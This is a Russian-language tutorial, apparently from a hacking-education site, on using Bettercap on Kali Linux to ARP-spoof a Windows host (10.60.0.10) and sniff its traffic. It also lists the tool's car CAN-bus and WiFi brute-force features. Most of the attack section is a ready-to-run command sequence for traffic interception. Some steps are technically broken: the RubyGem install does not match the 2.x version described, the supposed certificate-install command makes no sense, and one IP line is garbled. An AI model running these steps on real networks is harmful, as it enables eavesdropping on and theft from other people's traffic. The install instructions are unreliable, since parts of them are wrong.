Bettercap часто используется для атаки «человек посередине» (MITM). В этой статье покажу, как использовать Bettercap для перехвата сетевого трафика на Kali Linux.
Еще по теме: Использование Airgeddon для взлома WiFi
Что такое Bettercap
Bettercap — это мощный инструмент для тестирования на проникновение и выполнения атак в сети. Это можно сказать обновленный Ettercap.
Статья в образовательных целях и предназначена для обучения этичных хакеров. В процессе написания статьи использовались личные устройства автора. Ни редакция spy-soft.net, ни автор не несут ответственности за ваше неправомерное использование этого инструмента.
Основные возможности:
- Перехват и анализ сетевого трафика.
- Атаки на протоколы (ARP spoofing, DNS spoofing, SSLstripping и другие).
- Модификация трафика в реальном времени.
- Работа со скриптами для автоматизации задач и расширения функциональности.
- Визуализация и мониторинг сети.
Новая версия Bettercap 2.4.0
На днях вышла новая версия Bettercap 2.4.0. Помимо множества исправлений, эта версия добавляет несколько новых функций: взлом автомобилей и промышленных систем управления (ICS).
Модуль CAN для работы с автомобильными системами и промышленными системами управления:
- Чтение, запись и фаззинг сырых фреймов CAN-bus.
- Поддержка загрузки и воспроизведения дампов (candump).
- Инъекция фреймов с заданным ID и данными.
- Генерация случайных фреймов для фаззинга.
- Отображение списка обнаруженных ECU.
- Загрузка и использование DBC-файлов для автоматического анализа и фаззинга.
- Поддержка декодирования стандартных OBD2 PID с помощью встроенного декодера.
WiFi-брутфорсер для взлома WiFi паролей:
- Словарная атака для подбора паролей WiFi.
- Возможность остановки на первом успешном логине.
- Поддержка macOS и Linux.
Встроенный веб-интерфейс:
- Полная интеграция веб-интерфейса в без необходимости его отдельной загрузки.
- Поддержка модуля CAN в веб-интерфейсе.
Улучшения модуля BLE (в процессе):
- Переработка модуля для стабильной работы на всех поддерживаемых операционных системах.
- Возможность сборки проекта из исходников или использования Docker-образа.
Перехвата трафика с Bettercap
Этот проект проводился в моей изолированной, безопасной и контролируемой виртуальной среде. Машина, которую я буду использовать для запуска атаки, будет Kali Linux, а целью будет Windows 10 с IP-адресом 10.60.0.10.
Установка Bettercap
Bettercap уже установлен в Kali Linux по умолчанию, но если вы используете урезанную версию, то вот как установить Bettercap на Kali Linux.
Перед началом установки лучше всего обновить систему Kali Linux. Откройте терминал и выполните команду:
1 |
sudo apt update && sudo apt upgrade |
Bettercap требует некоторых зависимостей для корректной работы:
1 |
sudo apt install build-essential ruby-dev libpcap-dev |
Теперь можно приступить к установке Bettercap. Выполните команды:
1 2 |
sudo gem install bettercap sudo bettercap -eval "caplets.update; q" |
Первая команда установит Bettercap с помощью менеджера пакетов RubyGem. Вторая команда запустит Bettercap и обновит список caplet (скриптов) для использования.
В некоторых случаях для полноценной работы Bettercap могут потребоваться дополнительные компоненты. Например, для перехвата HTTPS-трафика может потребоваться установка сертификата Bettercap CA. Выполните следующую команду для установки сертификата:
1 |
sudo bettercap -eval "setcap web.ui.http.sslstrip_certs /usr/local/bin/bettercap" |
Чтобы убедиться, что установка прошла успешно, выполните команду:
1 |
bettercap -h |
Вы должны увидеть справку Bettercap.
Использование Bettercap на Kali Linux
Как пользователь root, выполните команду:
1 |
bettercap |
Чтобы найти все хосты, выполните команду:
1 |
net.probe on |
Отобразите список всех хостов в сети:
1 |
net.show |
В моем случае целевой IP-адрес Windows — 10 10.60.0.10.
Как только цель будет идентифицирована, можно запускать ARP-атаку для перехвата трафика.
Установите цель:
1 |
set arp.spoof.targets 10.60.0.10 |
Запустите спуфинг:
1 |
arp.spoof on |
Запустите сниффинг:
1 |
net.sniff on |
Откройте браузер целевого компьютера (в моем случае — Windows) и откройте какие-нибудь сайты.
Теперь, когда вернетесь на Kali Linux, увидите, как Bettercap перехватывает все действия целевой машины.
PTR query (запрос PTR) относится к определенному типу DNS-запроса, который называется запросом Pointer Record (Запись указателя). DNS — это система, которая переводит удобочитаемые доменные имена (например, site.ru) в IP-адреса (например, 192.0.2.1), понятные компьютерам.
Другими словами, в то время как обычный поиск DNS преобразует доменное имя в IP-адрес, PTR query делает обратное, преобразуя IP-адрес в доменное имя.
Заключение
В зависимости от конфигурации и безопасности сети, некоторые функции Bettercap могут быть блокированы или не работать корректно. Например, использование SSLstripping может быть затруднено в случае использования HSTS (HTTP Strict Transport Security).
Достоинства Bettercap:
- Гибкость и настраиваемость.
- Активное сообщество и поддержка.
Недостатки Bettercap:
- Может быть сложным для новичков.
Важно использовать Bettercap с осознанием и соблюдением принципов этичного хакинга и законности.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Анализ трафика с помощью сканера ZUI
- Перехват трафика в локальной сети по проводу
- Анализ трафика с помощью PcapXray на Kali Linux